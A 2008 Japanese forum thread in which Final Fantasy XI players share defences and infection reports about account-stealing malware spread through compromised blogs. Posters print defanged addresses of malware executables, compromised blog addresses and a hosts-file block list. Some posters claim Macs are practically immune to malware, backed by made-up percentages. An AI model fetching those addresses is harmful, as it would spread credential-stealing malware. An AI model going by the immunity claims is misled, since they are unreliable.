2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

●● RMT業者の垢ハックが多発している件13 ●●

1 :既にその名前は使われています:2008/03/11(火) 17:43:22.18 ID:JYRIBG0m
RMT業者が一般プレイヤーのID・パスワードを盗んで不正にログインし、
アイテムやギルを奪う事件についてのスレッドです。詳細は>>2-10くらい
前スレ→http://live27.2ch.net/test/read.cgi/ogame/1203055797/
■まとめサイト
【FF11】アカウント不正ログイン被害まとめ(過去ログあり)
ttp://ort.sakura.ne.jp/taisai/
FF11Warning(ハッキングに重点をおいて詳しくまとめてあります)
ttp://miku.a.orn.jp/miku2/
FFXI Virus問題 まとめサイト(初心者さん向け)
ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
★リアルタイムで被害に遭われている方へ★

まずサポセンに電話し、不正アクセスの被害にあっていると伝えましょう(本人確認の後、対処してくれます)
■スクウェア・エニックス インフォメーションセンター
  TEL:0570-003-399(PHSからは03-5333-1860)
  月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
※サポセンが営業時間外の場合は、別アカウントを所持しているならそれでログインしてGMを呼ぶか、
  他にログインできるアカウントがない場合はサポセンが開いてから電話をすることになります。

2 :既にその名前は使われています:2008/03/11(火) 17:44:06.37 ID:AOpE+QAw
■アカウントハックとは
主に中国のRMT業者(※1)がFF11関係のサイト(blogや情報サイト等)にアカウント情報を吸い出せる
罠ツールを仕掛けたサイトアドレスを貼り、FF11プレイヤーにそれを踏ませることにより
IDとpassを盗んで不正にログインし、所持アイテムやギルをを奪ってしまう(※2)行為の事です。
ログイン時にパスワードも変更され利用者本人がログイン出来なくなることも多々あります。

奪われたアイテムは各鯖にいるアイテム販売用キャラ(※3)が競売や店売りしてる模様。

※1:blogへの書き込みIP、リンクで飛んだ先のHPアドレスの所持者を調べると中国な為
※2:アイテムを奪われるだけの人も居れば、サーバー移動させられてたりキャラが消されていたりと多種多様の報告があります。
※3:Luckshop等、確認できるだけで21の鯖にいる業者の販売担当キャラ。FFAHで履歴調べると色々分かります

3 :既にその名前は使われています:2008/03/11(火) 17:44:34.21 ID:Iv9PIA0f
自キャラのミスラが現実に現れた件について

4 :既にその名前は使われています:2008/03/11(火) 17:45:10.21 ID:AOpE+QAw
■予防と自衛が各プレイヤーに求められています。
被害に遭わないためにも各自でできる限りの防衛手段を身に着けておきましょう。
【公式より抜粋】

▼内容が不明なサイトにアクセスしない
 ※blogのレスの名前部分(HPアド)にリンクをつけてリンクアドレスを見せないようにする手口もあります。
 絶対にリンクを押す前にアドレスを見る事

▼不明なサイトにあるソフトウェアのダウンロードを不用意に行わない

▼Microsoft Update(Windows Update)を定期的に実行し、Windowsを常に最新の状態に保つ
 ※詳しくはマイクロソフト社の公式サイトを参照のこと。

▼利用しているWebブラウザーなどを定期的にアップデートして常に最新のプログラムを使用する

▼スクウェアエニックス社が使用を認めていない外部ツールを絶対に使用しない

▼ウイルス駆除ソフトを常に最新のバージョンで使用する

5 :既にその名前は使われています:2008/03/11(火) 17:46:18.57 ID:AOpE+QAw
■具体的な自衛策
1:ウイルススキャンソフトを導入する。
  ・シマンテック、カスペルスキー、マカフィー、トレンドマイクロ社のソフトを有料で購入する。
  ・AVG、AntiVir、avast!、BitDefenderなどの無料ソフトをダウンロードして使用するという手もあります。

2:WindowsUpdateでWindowsを最新の状態にする
   Windowsは最初にインストールしただけで万全というわけではなく、次々と発見されるセキュリティホールを
   後付で修正し、それをWindowsUpdateで配布することで安全性を保つようにできています。
   一般的には自動更新がされるよう設定されていますが、重いからという理由で自動更新機能を
   オフにしている人もいると思います。その場合は必ず定期的に手動で更新を行ってください。

3:ファイアウォールを有効にする
  ・1に上げた有料ソフト等に同梱されているものや、同じ会社から出ているものを使う

  ・ベクターや窓の杜などでフリーのファイアウォールソフトを探し、導入する
   (2chカテゴリ「ネット関係」>「セキュリティ」板にフリーのファイアウォールソフトの
    スレッドがあります。「ファイアウォール」などの単語で検索してください)

6 :既にその名前は使われています:2008/03/11(火) 17:46:58.73 ID:AOpE+QAw
■具体的な自衛策その2

4:IPフィルタを導入する
  PeerGuardian2というフリーソフトで特定の国(この場合は特に中国)のIPへのアクセスを遮断できます

  ★PeerGuardian2の導入・設定方法はここから
    リネージュ資料室 ttp://lineage.nyx.bne.jp/misc/security/id_basic-ipfilter.html
    このURLを踏みたくない人はgoogleで『リネージュ資料室』で検索してメニューから
    セキュリティー対策→IPフィルタ で確認してください。

5:IE以外のウェブブラウザを使用する
  Firefox、Opera、など。
  ただしそれぞれのブラウザにもセキュリティホールが見つかることもあるので、
  ブラウザ自体のアップデートも行う必要があります。

6:不審な・見覚えの無いURLを踏む必要がある場合は、まずaguse.jpやソースチェッカーを使用する。
  ttp://www.aguse.jp/ 
  URLを入力するとそのページのSSとドメイン情報、各ブラックリストに照らし合わせた結果が表示されます。
  ソースチェッカーにはWebページ上のものと、DLして使用できるフリーソフトがあります。

7 :既にその名前は使われています:2008/03/11(火) 17:47:30.36 ID:AOpE+QAw
■もし被害に遭ってしまった場合
「ある日突然登録してあるパスワードでログインできなくなった」もしくは「ある日ログインすると
キャラクターのアイテムやギルが奪われていた」等の、不正アクセスと思しき被害にあった場合は、
まず>>1にあるサポセンの連絡先に電話してパスワードの再発行を受けたり、不正アクセスの被害を
受けたことを報告しましょう。

現時点(平成19年10月下旬)でのスクウェアエニックス社インフォメーションセンターの。不正アクセス被害者への
対応は、「社内の調査だけでは不正アクセスと断定することができない」という調査結果の報告のみです。

不正アクセスと断定できないとはつまり、「RMT業者に自発的にアイテムやギルを受け渡したのは
被害者本人である」ということにされている状態です。

この状態の打開及びさらなる追及を望むならば、警察への届出が必要になります。
不正アクセス行為の禁止等に関する法律、通称不正アクセス禁止法においては、
こういった事例での被害者は「不正アクセスをされた側」つまりスクウェアエニックス社になりますが、
アカウントを乗っ取られた側でも「利用権の侵害」として被害を届出することができます。

8 :既にその名前は使われています:2008/03/11(火) 17:48:50.08 ID:AOpE+QAw
■警察への通報方法
1:まず住んでいる都道府県警が設置しているサイバー犯罪相談窓口に相談の電話やメール送信をしておきます。
  都道府県警察本部のサイバー犯罪相談窓口等一覧
  ttp://www.npa.go.jp/cyber/soudan.htm

2:相談窓口から「所轄の警察署に直接行って相談するように」という返事が来ます。
  (この段階を踏まずに直接所轄署に行くと、「専門の窓口に連絡しろ」と言われてしまう可能性があります)

3:所轄署に電話で連絡し、直接訪問して話を聞いてもらえるか確認します。

4:資料を持参して所轄の署に赴き、「利用権の侵害」での被害を報告します。
  「たかがゲームのアイテムを取られたからって警察に行くなんて…」という方もいるかもしれませんが、
  家族やネット上、またこのスレッド内でそういったことを言われても気にせず警察に相談しください。
  利用権の侵害というのは立派な被害です。警察の方もちゃんと話を聞いてくれます。

9 :既にその名前は使われています:2008/03/11(火) 17:49:19.26 ID:AOpE+QAw
■警察へ行く際に持っていく・用意しておくもの
過去スレで実際に警察へ行った被害者のレスから抜粋

もっていったもの †
o スクエニの会社情報 HPのプリントアウトしたもの
o プレイオンラインサポセンの電話番号
o 印鑑、身分証明
受け答えしてくれたサポセンの人の名前も伝えるといいかも


警察で聞かれたもの †
o プレイオンラインのIDとパスワード
o キャラ名
o 犯行時間帯
o 被害内容(なくなったゲーム内通貨・アイテム)
o プロバイダ

10 :既にその名前は使われています:2008/03/11(火) 17:49:44.74 ID:AOpE+QAw
■このスレの目的
1:予防・自衛の徹底の周知
2:被害報告の収集
3:罠サイトURIの収集
4:被害者が現れた場合に対処をアドバイスする

★age進行(mail欄に何も書かない)でネ実民及びFF11プレイヤーへの周知と啓蒙にご協力ください

☆「スクエニ社に法的責任を!」や「誰が悪いかランキング」、「被害者の会を作れ」等の議論も
この場で行ってくださって構いませんが、スレを見に来た一見さんの質問や被害者の報告は
無視せずに対応してください。

11 :既にその名前は使われています:2008/03/11(火) 17:50:33.01 ID:AOpE+QAw
■アカウントハックの救済について署名して下さい
ttp://www.petitiononline.com/FFvoice/petition.html
[Click Here to Sign Petition]=請願に署名して下さる方はこちらをクリックして下さい。

Name=名前(必須)  Email Address=メール(必須)  Real name=本名(任意)  Server name=サーバー(必須)

Email Address Privacy Option=メールアドレスプライバシーオプション
:Private=署名妥当性確保のためのメールアドレスですプライベートでスクウェアに提供されません
:Available to Petition Author=プライベートですがスクウェアに提供されます
:Public=全ての人が閲覧可能です

[Preview Your Signature]=貴方の署名を確認します

View Signatures Without Signing=署名をしないで他の署名を見ます

12 :既にその名前は使われています:2008/03/11(火) 17:50:50.91 ID:AOpE+QAw
俺乙。テンプレ長いね

13 :既にその名前は使われています:2008/03/11(火) 18:05:32.62 ID:C+oV/2In
いちょつ

14 :既にその名前は使われています:2008/03/11(火) 18:12:18.13 ID:SF1kHfuz
いちおつ

※尚2月下旬から騒ぎになっているFC2ブログハックの件は>>5を全部実行しても防げないらしいです

15 :既にその名前は使われています:2008/03/11(火) 18:13:45.82 ID:AOpE+QAw
前スレで出た話

大きさ0のiframe(インラインフレーム)を
ブログ(のテンプレート)に仕込む手口が急増しています。
iframeを生で使えるブログは限られる(FC2、サーパラ等)と思いますが
ブログを持っている人は定期的にブラウザからソースを表示して
「iframe」で検索して確認してください。閲覧者をも危険に陥れます。

16 :既にその名前は使われています:2008/03/11(火) 18:46:45.03 ID:jEZao5To
>>14
本当に?

17 :既にその名前は使われています:2008/03/11(火) 18:57:24.04 ID:SF1kHfuz
細かいことはわからんけど前スレにWindowsUpdate最新で
ノートンの更新もしててハクられたひとがきてたはず

18 :既にその名前は使われています:2008/03/11(火) 19:06:30.21 ID:vM0vfCDE
>>5
これぐらいでは対応が甘いな。
とりあえず最近流行しているPOLパスワードを盗んでいくマルウェアに
例え感染しても被害を受けないためには
(実際>>5程度の生ぬるい対応では感染はまぬがれない)
POLパスワードを登録保存せず、毎回手入力でログインするべし。
POLパスワードを登録保存せず、毎回手入力でログインするべし。
POLパスワードを登録保存せず、毎回手入力でログインするべし。
POLパスワードを登録保存せず、毎回手入力でログインするべし。
POLパスワードを登録保存せず、毎回手入力でログインするべし。
POLパスワードを登録保存せず、毎回手入力でログインするべし。
POLパスワードを登録保存せず、毎回手入力でログインするべし。
POLパスワードを登録保存せず、毎回手入力でログインするべし。

まぁ、これを全員が対策したところで、
今度はキーロガータイプのマルウェアが出てくるのが目に見えているんで
一時しのぎって意味合いしかないけどな。

19 :既にその名前は使われています:2008/03/11(火) 19:09:54.85 ID:vM0vfCDE
てか、FFをしたいがために最近Windowsを使い始めたんだが、
すっごくセキュリティに気を使わないといけないんで
疲れるね。Windowsは。
Macならそもそもマルウェアなんかに感染しないし(註)、
Mac版のFF出してくれないかなぁ。

註「マルウェアなんかに感染しないし」について説明。
Macでも穴があるのは事実だが、
世の中に出回っているマルウェア、ウイルスの
99.999999999%がWindowsにしか感染しないタイプなので
事実上、Macはマルウェアに感染しないといっても過言ではない。
そこんところ現実をわかってないただのセキュリティオタクには
突っ込まれそうなんで一応補足しておく。

20 :既にその名前は使われています:2008/03/11(火) 19:21:51.91 ID:pT4nTFvh
Windowsのウィルスが怖いなら
PS2使えばいいじゃない

21 :既にその名前は使われています:2008/03/11(火) 19:22:20.00 ID:Tz2Htq51
なんかSM-DOS言ってる山岡が浮かんだ

22 :既にその名前は使われています:2008/03/11(火) 19:34:56.28 ID:U/Nxor/m
定期的にマカーが沸くなw

23 :にゃにゃし:2008/03/11(火) 19:36:16.29 ID:yhBi+tsf
PeerGuardian2いれてたから
ペッテンに仕込まれたやつ回避したにゃ
ブロック遍歴いぱーい

24 :既にその名前は使われています:2008/03/11(火) 19:52:45.13 ID:qSwvfR1A
FF11がMacでもできるようになったら
業者もMac用の罠作るんじゃないの

25 :既にその名前は使われています:2008/03/11(火) 20:31:18.40 ID:pNZsw+0F
>>14
詳しく!

26 :既にその名前は使われています:2008/03/11(火) 23:41:23.61 ID:ZgH4UdE+
>>24
今もってなおふさがれていない、RealPlayerの脆弱性を利用したトラップが、
fc2のブログをハックして仕掛けられていました。

fc2本体がハクられたのか、fc2ユーザーのアカウントがハクられたのかは不明なのですが、
テンプレート自体にいつのまにかiframeが仕込まれていたそうです。

27 :既にその名前は使われています:2008/03/11(火) 23:41:56.22 ID:ZgH4UdE+
ちが、>>25のミスでした。
しかも保守のつもりが上がってねえ_| ̄|○

28 :既にその名前は使われています:2008/03/12(水) 00:51:40.73 ID:qCE5oa54
otisugi

29 :既にその名前は使われています:2008/03/12(水) 00:54:40.93 ID:JjezpGEV
>>19
Macが平和な時代も終わりつつあるようですよ。
自分だけは大丈夫というのが一番危ない。

Macウイルス監視サイトがMacマルウェア配信に加担?
http://www.itmedia.co.jp/enterprise/articles/0803/11/news033.html


30 :既にその名前は使われています:2008/03/12(水) 00:56:21.77 ID:x9KGBS3N
://vanamon■blog53■fc2■com/?overture
ヴァナモンブログに張ってあるこの広告踏んでも大丈夫?
日本企業だけど鯖は中国ってだけかしら。

31 :既にその名前は使われています:2008/03/12(水) 01:10:54.20 ID:7RZ5ZGAT
>>30 たぶん、大丈夫。

overtureはYahoo!傘下の広告会社。
接続先(content.ysm.vip.jp2.yahoo.com, 124.108.65.97)は
APNIC管轄のIPアドレスなので、サーバの場所はアジア太平洋の
どこかだとしかいえない。aguseの地図は中国のど真ん中を指している
けど、よく見ると都市名は不明になってるでしょ。
tracerouteしても途中で切れるから保証はできないけど、日本国内に
あるサーバじゃないかな。

32 :既にその名前は使われています:2008/03/12(水) 07:01:36.36 ID:MKZtSNNv
OvertureはGoogleで言えばGoogleAdsenseみたいな
米Yahoo!傘下のスポンサー広告を扱う企業。MSN等も使ってた。
審査は甘く、FFの中華罠サイトの元祖「花の雫FF11情報局」の広告を載せたことがある。

33 :既にその名前は使われています:2008/03/12(水) 07:13:30.51 ID:MKZtSNNv
今月のWindowsUpateはOfficeだけか…。1つも無かった。

34 :既にその名前は使われています:2008/03/12(水) 07:26:52.72 ID:H8vRTpwr
200台なのにsageんなよw

35 :既にその名前は使われています:2008/03/12(水) 07:30:03.74 ID:MKZtSNNv
前スレの終わり間際に出ていた、
サーパラブログに仕掛けられた物を再スキャン。
各社に検体を送付してから15時間経過。
ttp://www.virustotal.com/analisis/b1f0d3af89749ed3ea7cf1c9839555d2

36 :既にその名前は使われています:2008/03/12(水) 07:30:34.71 ID:/4f/wP41
ここ見てるとfc2とサーパラ経由で引っかかってる人多そうだから\windows\system32\drivers\etc\hostsに
以下の行を追加して遮断したわ。遮断してもデメリットは特に無かった。

 127.0.0.1 www.surpara.com
 127.0.0.1 surpara.com
 127.0.0.1 www.fc2.com
 127.0.0.1 fc2.com

IE使うのとっくにやめてFirefox使っているんだが先日NoScriptなるadd-onをインストールしたけど
これ凄いわ。Java,Flash,<IFRAME>,Silverlight,その他プラグインをまとめて遮断してくれる。
ただこれだと見えないページが多いからどうしても見たいサイトは一時的に例外処理とかもできる。
導入方法はFirefoxのメニューからツール→アドオン→新しい拡張機能入手から[NoScript]を検索すればok

37 :既にその名前は使われています:2008/03/12(水) 07:34:53.40 ID:QBfcOaT2
>>29
第三者的な視点でマカーが安心だとは言えないのはわかるが、昔からその手の話はたくさんあって今にいたってるからマカーはもう麻痺してる。
ウィンドウズPCと比べてシェアが100倍くらい違うから業者ちゃんが見向きもしない。

38 :既にその名前は使われています:2008/03/12(水) 07:35:43.92 ID:M7OuaZr3
    .イ: :死: : 死: : ;v:怨念 : 死ヽ: :ヽ      
     /: :イ: :死; ;/ヽ; ; ;i: :怒:イ: :|       ぼくちゃんはOdinのGamblianですwwwwwwww
     |/:釘:/::/怒v 怨 |:/V、:/: ::|      
  (ヽ  イ:/(|((死 )).死 '呪 ゚)):怨:|  /)   
  (((i)  |: ; |:⌒釘、。。.  ⌒:イ呪ゝ (i)))   カンパニエでイナゴをMPKしていますwwwwwwwwwwww
 /死/  '´'ヽ, |r死┬-|呪./死´'´ __ゝ.\
(_死 ̄ ̄呪 :ー| 死  | 呪⌒ ̄.____)
     ̄ミヽ ・.. `ー死´ 呪..・ /ミ      誰の目にも届かないほど遠くでキープしていますwwwwwwww
      ノ釘  u 死    呪|
     / 死  釘 怒 死  ノ       
    /  釘怨   +死  ...∠_
    |  u f\ ..死::;;;:::...  ノ     ̄ヽ   イナゴが寄ってきたら自分だけ逃走しますwwwwww
    | 怨念|  ヽ(∪)ノー─死、. 死 )
  /  .ノ            | 怨  /   
  / u /              | ../
..ノ死/              ノ 〈  関係ないけどサチコメに「採掘で横掘りされたらやり返すお!」って書いたことありますwwwwww

39 :既にその名前は使われています:2008/03/12(水) 07:49:41.36 ID:s8TSxoBN
POLパスワードを登録しないで毎回入力してはいってもハックされましたよ〜

40 :既にその名前は使われています:2008/03/12(水) 07:56:29.35 ID:MKZtSNNv
>>36
www.fc2.com
fc2.com
これブロックしても意味ねーぞ。
なんちゃら.blogなんちゃら.fc2.com の形式なので。
で、hostsに*.fc2.comみたいな指定はできないので
ファイアウォールなどで指定するしかない。

あとNoScriptがすげーと言っても
そもそもFxデフォルトでiframeを切ることができない
(IEやOperaは切れる)ので、まーどっちもどっちだ。

41 :既にその名前は使われています:2008/03/12(水) 09:08:48.71 ID:xTjGFHD7
MacBook Proで基本はほとんどMacOSXで仕事とプライベートをこなしている。
Windowsはほとんど使ったことなかったが、
FFをしたいがためにMacBook ProにWinXPをインスコした。
Winで起動するのはFFするときだけって感じ。

IEやめてFirefoxにしたが、それだけじゃまずいときいて
NoScriptをさっそくいれてみた。
いろいろブロックしてくれて安心のような気もしますが、
同時にいろいろデホではみれなくなって使いにくくなりました。

だいたいMacなら感染のことなどなにも考えずにWebブラウズできるのに
Winという環境を生きていく上にはいろいろと気を使うんですな。
Winで仕事やプライベートまでやってるやつらがかわいそうになってくるが、
まぁそいつらのおかげでMacな俺は幸せに生きていけるわけで、
それはシェアの少ない環境のおかげなのだから
そいつらはいつまでもWinな環境で生きていってほしいと願う。
間違ってもMacなら気を使わずに暮らしていけるときいて
Macにすっ飛んできますた!!などということはやめてほしい。
おれが幸せに生きていくために。

42 :既にその名前は使われています:2008/03/12(水) 09:12:04.88 ID:iekwPtMo
で、どこを縦読みすればいいんだ?

43 :既にその名前は使われています:2008/03/12(水) 09:13:30.21 ID:xTjGFHD7
そうだな、例えると
大雨の中を傘さして歩くか(Win)、
晴天の下を傘なしで歩くか(Mac)って感じかな。気分的に。
それでもわからんやつにもっと例えると、
戦争中の機銃掃射の中を防弾チョッキで完全防備して暮らすか、
平和な国の街中を普段着で歩くか、
そんな感じに思える。

実際、Macずっと使ってるが一度もアンチウイルスソフトなど
入れたこともないし、被害にあったこともない。
そんな感覚でWinを使い始めた俺もバカだったが、
先日FFの垢ハックされたときからいろいろとWin上のセキュリティに
気を使うようになって、そのときに感じたのが上記の例。

44 :既にその名前は使われています:2008/03/12(水) 09:15:09.30 ID:QBfcOaT2
縦読み出来ない、俺にはピーキー過ぎるのかも

45 :既にその名前は使われています:2008/03/12(水) 09:22:53.54 ID:Hmy7ced0
最近のMacは、WinXPをインスコできるのか???
Macにも昔からウィルスあったぞ
ノートン先生すらいれてなかったのか???
こいつ謎すぎる

46 :既にその名前は使われています:2008/03/12(水) 09:26:55.34 ID:MKZtSNNv
要約
ウイルスにも相手にされないMacOSX

47 :既にその名前は使われています:2008/03/12(水) 09:47:02.65 ID:xTjGFHD7
>>45
ヒント 車運転で死ぬ確率 0.001%
    Macで感染する確率(無対策) 0.0000001%
    Winで感染する確率(無対策) 99.99999%

車で死ぬのが怖いからって、車運転しない人はいないだろ。
Macで感染するのが怖いからって、(ry

ちなみに、最近のMacは全部Winがnative稼働する。デフォで。
もちろんWinOSは別途購入する必要があるが。
Mac/Winの切り替えは再起動な。

48 :既にその名前は使われています:2008/03/12(水) 09:49:55.83 ID:0FX8XGs8
ハックされてはや4ヶ月。。。
スクエニからも報告がない。。。
仕事しやがれう゛ぉけがあ!

49 :既にその名前は使われています:2008/03/12(水) 09:51:50.58 ID:MKZtSNNv
>>45
今のIntelCPU(Core2等)搭載MacのPCとの差は極端な話、BIOSが載っていないだけ。
それをエミュるのがLeopard(OSX 10.5)に付いてくるBootCamp。
BootCampがあればXPだろうがVistaだろうが動作する。

IntelMacはBIOSが無いのに誰がOS起動までの面倒見るのかというと
BIOSの代わりにEFIが載っている。
EFIはIntelとMicrosoftが提唱した次期BIOSとも言える物だけど、
PCマザーボードではあまり普及していない
(そのためVistaでもサポートを中止した)。
IA64版があるServer2003やServer2008ならサポートされる。
IntelMacは初のEFI対応PCとも言える。

とageつつ無駄話。

50 :既にその名前は使われています:2008/03/12(水) 09:54:14.12 ID:xTjGFHD7
>>49
BootCampときいて/dance2と打ち込んでしまいますたw

51 :既にその名前は使われています:2008/03/12(水) 09:55:44.18 ID:MKZtSNNv
そうそう、今のMacの価格はスペックからすると
メーカのPCにオプションでハイエンドビデオカード付けるより
安かったりする。もちろんFFも俺のヘボ自作PCよりガンガン動く。
貧者のWindowsPC、と言ったら言い過ぎかw

52 :45:2008/03/12(水) 10:05:33.83 ID:Hmy7ced0
そうなんだ、勉強になったわ
自分、仕事でmac使ってるけど
最近のmac事情には疎かった


53 :既にその名前は使われています:2008/03/12(水) 10:14:38.35 ID:MKZtSNNv
ちなみにBootCampにWindowsドライバも付属する。…が。
たとえばMacのキーボードに「半角/全角」キーが無いので
「IMEオンにできなくて日本語打てねー!!1!!wwwうぇwww」とか
まれによくあるのでその辺はキーを入れ替えるユーティリティを
各自拾ってどうにかしてください。

なお逆はできない(WindowsPCでMacOSXが動くわけではない)。

54 :既にその名前は使われています:2008/03/12(水) 10:17:54.47 ID:MKZtSNNv
なんか脱線してもうた。
通報したサーパラブログはごっそり消えた模様。

55 :既にその名前は使われています:2008/03/12(水) 10:41:08.85 ID:pKFUq6Mz
今回のリアルプレイヤーみたく、アプリ側の穴が開いたまんまで亜種作られると

誰かが通報→検体提出→アンチウイルスソフト対応

までの間WinUpateしてようがアンチウイルスソフト自動更新してようがどうしようもないからね
今回のFC2の奴はかなり亜種を作りやすいプログラムらしい

56 :既にその名前は使われています:2008/03/12(水) 10:53:28.52 ID:MKZtSNNv
RealPlayer関連。

RealPlayerのActiveXコントロールにパッチ未提供の脆弱性
ttp://internet.watch.impress.co.jp/cda/news/2008/03/11/18762.html
脆弱性はRealPlayer 11.0.1(build 6.0.14.794)で確認されたほか、
他のバージョンにも影響があると推測されている。

えーと。日本語版は6.0.14.748が最新なので
去年の穴すら開いたままでございます。

57 :既にその名前は使われています:2008/03/12(水) 11:24:38.69 ID:pKFUq6Mz
>FF11 ビシージ衛生兵視点「五蛇将編」‐ニコニコ動画(RC2)
>http://maplestorfy■w16s核okwit■com/kurubusi/sityounew■html
>(注:要会員登録の動画サイト。

>なんというか、将軍の貴重な技や組み合わせがあって

>ビシージ好きにはたまらない動画です)

まったく疑わずに踏んでしまった・・・
ノートン先生にめっさ怒られたよ・・・

なんか流暢な日本語で、流れの中にすぅーっと貼られると
ぜんぜんダメだわ・・・どうしたもんかね、コレ

58 :既にその名前は使われています:2008/03/12(水) 11:30:58.34 ID:44EgVWLN
>>57
これだけ注意喚起の書き込みがあるのに
ぽんぽん踏むんじゃどうしようもないだろ


59 :既にその名前は使われています:2008/03/12(水) 11:41:41.31 ID:pKFUq6Mz
>>58
将軍の貴重な技動画見たかったんだよ( ´口`)
分かってるよ、オレがバカなのぐらい

60 :既にその名前は使われています:2008/03/12(水) 11:43:33.98 ID:MKZtSNNv
>>57
流暢もなにもコピペだし

61 :既にその名前は使われています:2008/03/12(水) 11:44:12.69 ID:etj9uPxt
>>57の動画のうp主が罠サイト誘導のネタに使われたなんて知ったら、かわいそうに・・・
中国業者はほんとろくな事しない・・・

62 :既にその名前は使われています:2008/03/12(水) 11:44:47.98 ID:EfIH6CoN
流暢もなにもほんとのビシージ動画についてた説明文のコピペだな
とりあえずまっぶるすとーふぃをNGに入れておいたらいいんじゃないの

63 :既にその名前は使われています:2008/03/12(水) 11:55:14.41 ID:MKZtSNNv
>>57
起動するRealPlayerはダミー。iframeで仕込みあり。
maplestorfy■w16■okwit.com/xin/xia.exe
Upackで固められていて何をするのかはわからんけど
1月製造の物なのでだいたい検知する模様。
ttp://www.virustotal.com/analisis/b70e52ee387eacbf26708df41e3ff62e

64 :既にその名前は使われています:2008/03/12(水) 12:13:35.00 ID:jtGbFtiy
ニコニコへのリンクなんだから、niconicoがURLに入ってない時点でアウアウw

65 :既にその名前は使われています:2008/03/12(水) 12:17:56.34 ID:MKZtSNNv
IE 5とIE 6にCSRFの脆弱性
ttp://www.itmedia.co.jp/enterprise/articles/0803/12/news014.html
ようこそIE7へ! IE8Beta1もあるよ!

66 :既にその名前は使われています:2008/03/12(水) 13:18:32.52 ID:U1rLcd9C
>>57
本物の動画はニコニコのsm2384170にあるみたいだ。
ノートン先生がいてくれて良かったな、一応他のオンラインスキャンも試したほうが安心かも

67 :既にその名前は使われています:2008/03/12(水) 14:45:46.16 ID:etj9uPxt
PG2入れてみたけど、有名ブログ2,3こしかまわってないと思ったのに韓国IPブロックしてた。
・・・どこに何があるかわからないですね

68 :既にその名前は使われています:2008/03/12(水) 14:52:01.82 ID:pKFUq6Mz
>>66
さんくすこ見てくる
とりあえずこのPCでFFやってないから垢ハックは大丈夫だと思う
すぱいうぇあとか怖いから別のも試してみるよ、ありがと

69 :既にその名前は使われています:2008/03/12(水) 14:52:47.76 ID:HMQPvftt
>>59
まあ、でも気持ちはわかるw

向こうもそういうところねらってるんだろうけどなあ

70 :既にその名前は使われています:2008/03/12(水) 14:58:02.03 ID:etj9uPxt
>>68
キキルンヴァージョンもうpされてたよw

71 :既にその名前は使われています:2008/03/12(水) 16:01:16.31 ID:ZIXRWN6n
ニコニコ

72 :既にその名前は使われています:2008/03/12(水) 16:02:44.56 ID:mK9JP7mk
>>67
その有名ブログ2,3個ってどこなのかな?


73 :既にその名前は使われています:2008/03/12(水) 16:18:40.85 ID:MKZtSNNv
戦士スキーさんのとこまた改ざんされたのか…。
ffxiwar.blog91.fc2.com/blog-entry-221.html
とりあえずスクリプトを解読して検体を入手、各社に提出は終わった。
ちょっと出かけるのでまとめは後ほど。

74 :既にその名前は使われています:2008/03/12(水) 16:28:25.73 ID:5ueP+uYF
>73
今回の新型だったの?

75 :既にその名前は使われています:2008/03/12(水) 16:44:39.83 ID:O7It2Xdp
3月頭からのテンプレートハックに遭ったブログって他にどこだろ
原因がブログ主が罠サイト踏んだ以外の個人ミス以外なら
被害に遭った所とそうでない所を比較検討してみたら少し見えてこないだろうかね
ここ詳しい人多そうだし

76 :既にその名前は使われています:2008/03/12(水) 16:50:16.23 ID:MKZtSNNv
>>74
うむ。ひどいありさまだ。
スキャン ttp://www.virustotal.com/analisis/074714fbc0a0ce7af4d12d9caf5fea94

77 :既にその名前は使われています:2008/03/12(水) 16:54:41.24 ID:etj9uPxt
ブログと違ったら失礼と思って確かめにいったけど、fc2じゃなかった::(ヽ'ω`): : どこから流れてきたんだろう
有害スクリプト有りってでたのはアダルト広告がひっかかっただけっぽいし
(↑アダルトサイトじゃなくて、アダルト同人誌とか商業誌だしてる個人サイトさん)

78 :既にその名前は使われています:2008/03/12(水) 16:54:45.43 ID:MKZtSNNv
>>75
把握しているのはFFXI系で4つ、ぺってん、戦士スキー、黒猫奮闘記、某青魔道士。
でも今回のもLineage2トロイなので他のジャンルのブログでもありそうだけど。

79 :既にその名前は使われています:2008/03/12(水) 17:01:32.45 ID:5ueP+uYF
>76
おいおい>73のところ新型をバラまいてたのかよ・・・


80 :既にその名前は使われています:2008/03/12(水) 17:02:19.06 ID:Sd6cj8cL
この状況に対してスクエニがSTTレポートでテンプレ発言を月一でしかしないのはどうかと。
ネカフェから繋いだら不正アクセスの捜査ができなくなる恐れがある、くらいは公式TOPに載せろよ。

81 :既にその名前は使われています:2008/03/12(水) 17:05:25.11 ID:mK9JP7mk
>>78
有名ブログどころ(?)をあまり把握していない自分は
それだけじゃどこか分からないわ…

82 :既にその名前は使われています:2008/03/12(水) 17:12:23.10 ID:MKZtSNNv
petsoro.blog91.fc2.com/blog-entry-176.html
でも情報あった。某青魔道士さんとこもまたやられて閉鎖だそうだ。
www16.ocn.ne.jp/~ff11blue/

>>81
ググれば出るキーワードにしたつもりなんだが…。

83 :既にその名前は使われています:2008/03/12(水) 17:13:13.22 ID:202cagxd
トレンドマイクロのウイルス情報ページが改竄、ウイルスを埋め込まれる
http://internet.watch.impress.co.jp/cda/news/2008/03/12/18775.html

84 :既にその名前は使われています:2008/03/12(水) 17:22:26.63 ID:MKZtSNNv
>>83
おいおい…さすが台湾ウイルスバスター…

85 :既にその名前は使われています:2008/03/12(水) 17:26:18.05 ID:mK9JP7mk
>>82
ごめんよ
ググれば良かったのか、悪かった。

86 :既にその名前は使われています:2008/03/12(水) 17:35:01.47 ID:etj9uPxt
OCNかぁ・・・

87 :既にその名前は使われています:2008/03/12(水) 18:02:22.09 ID:MKZtSNNv
スクリプトがどうなっているか書こうとしたけどめんどいのでやめた
(dda3よりさらに面倒になっている)。
www■hellh■net/
(略)
www■hellh■net/win.exe

てかこの辺をネタにしてブログ作ろうかな。FC2で。

88 :既にその名前は使われています:2008/03/12(水) 18:04:18.01 ID:EErp9NDN
初心者質問ですいませんが、FFやるのは専用PCでネットやるのはMacPCこれ最強??
(分けて運用にしてもWinネット専用PCが感染したらこわいので、、、)

89 :既にその名前は使われています:2008/03/12(水) 18:08:24.84 ID:pKFUq6Mz
>>88
Macでも喰らう時は喰らう
ただWindowsに対してMacOSの方が圧倒的に母数が少ないので
ウイルス作る側の人も相手にしてない分喰らう可能性が低い

でも、そのチョイスは正解の一つだとは思う
っつか金持ちめっ

90 :既にその名前は使われています:2008/03/12(水) 18:08:38.34 ID:APShacGb
